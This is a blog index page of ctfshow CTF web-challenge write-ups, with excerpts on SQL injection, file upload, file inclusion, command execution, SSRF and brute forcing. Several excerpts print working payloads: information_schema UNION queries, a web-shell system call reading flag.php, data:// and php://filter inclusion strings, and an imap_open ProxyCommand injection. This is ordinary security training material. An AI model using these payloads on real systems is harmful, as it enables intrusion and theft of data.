![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
ctfshow_web入门
文章平均质量分 87
succ3
Everything is done, like a dream bubble!
展开
-
ctfshow nodejs
大小写转换特殊字符绕过。原创 2023-02-12 16:08:11 · 540 阅读 · 0 评论 -
ctfshow XSS web316~web333
ctfshow XSS web316~web333原创 2022-11-25 12:46:09 · 1848 阅读 · 0 评论 -
ctfshow 新手杯 web
基础练习原创 2022-10-09 21:25:48 · 720 阅读 · 0 评论 -
ctfshow phpCVE web311~315
php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。原创 2022-10-07 12:21:10 · 673 阅读 · 0 评论 -
ctfshow SSRF web351~360
SSRF练习和学习原创 2022-09-25 21:54:56 · 1273 阅读 · 0 评论 -
ctfshow 代码审计 web301~310
知识点:SSRF--gopher协议打FastCGI(PHP-FPM的未授权访问漏洞),file伪协议,nginx配置文件原创 2022-09-24 16:10:24 · 794 阅读 · 0 评论 -
ctfshow 反序列化 254~
web 254如果username全等于我们传进去的值相同,则返回true,并返回flag?username=xxxxxx&password=xxxxxxweb 255原创 2022-04-04 13:58:26 · 645 阅读 · 0 评论 -
ctfshow sql注入 171~
ctfshow sql爆表:-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="ctfshow_web";--+爆列:-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_nam原创 2022-03-30 22:10:33 · 680 阅读 · 0 评论 -
ctfshow 文件上传 web151~170
目录web151web 152web 153web 154web 155web 156web151上传提示,前端验证上传.jpg文件然后抓包,改文件名为.php,加入一句话木马。upload/1.php?1=system("cat /var/www/html/flag.php");web 152同上,但对Content-Type进行了过滤。upload/1.php?1=system("cat /var/www/html/flag.php");web 153过滤了php,大小写改一原创 2022-03-22 20:49:02 · 1331 阅读 · 0 评论 -
ctfshow php特性 web 89~150plus
目录web 92web 93web 94web 95web 96web 97web 98web 99web 100web 101web 102web 103web 104web 92num=0x117cintval($num,$base=0)//当base为0时,会自动检测num的进制//例如:0x117c(16进制) == 4476(十进制) == 010574(8进制)web 93在这里插入代码片web 94web 95web 96web 97web 98web 99w原创 2022-03-07 16:28:00 · 701 阅读 · 0 评论 -
ctfshow 文件包含 web 78 -117
目录web 78web 79web 80web 81web 82web 78data://text/plain,<?php system("cat flag.php");?>php://filter/convert.base64-encode/resource=flag.phpweb 79file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=//PD9waHAgc3lzdGVtKCdjYXQgZmx原创 2022-02-27 12:30:57 · 1459 阅读 · 0 评论 -
ctfshow 命令执行 web 29~124
原理:因为localeconv()的第个元素是“.”,然后pos()能够提取出当前元素的值,也就是“.”,而scandir()能过返回指定目录中的文件和目录的数组,然而上一层pos()已经提取出".“,这样就变成scandir(”.")返回当前目录下的目录数组,array_reverse()以相反的元素顺序返回数组,next()提取第二个元素,最后用read_file()、highlight_file()和show_source()读出源码。//若成功,则返回一个数组,若失败,则返回 false。原创 2022-02-22 11:44:01 · 429 阅读 · 0 评论 -
ctfshow 爆破 web 21~28
知识点:exp爆破下载题目所给字典写脚本爆破import base64import requestsfilename = 'passwd.txt'url = "http://ddad1bfa-27c0-45e9-aff1-6f26541c16e1.challenge.ctf.show/"with open(filename, 'r') as f: while True: passwd = f.readline() if not passwd:原创 2022-02-20 12:55:07 · 687 阅读 · 0 评论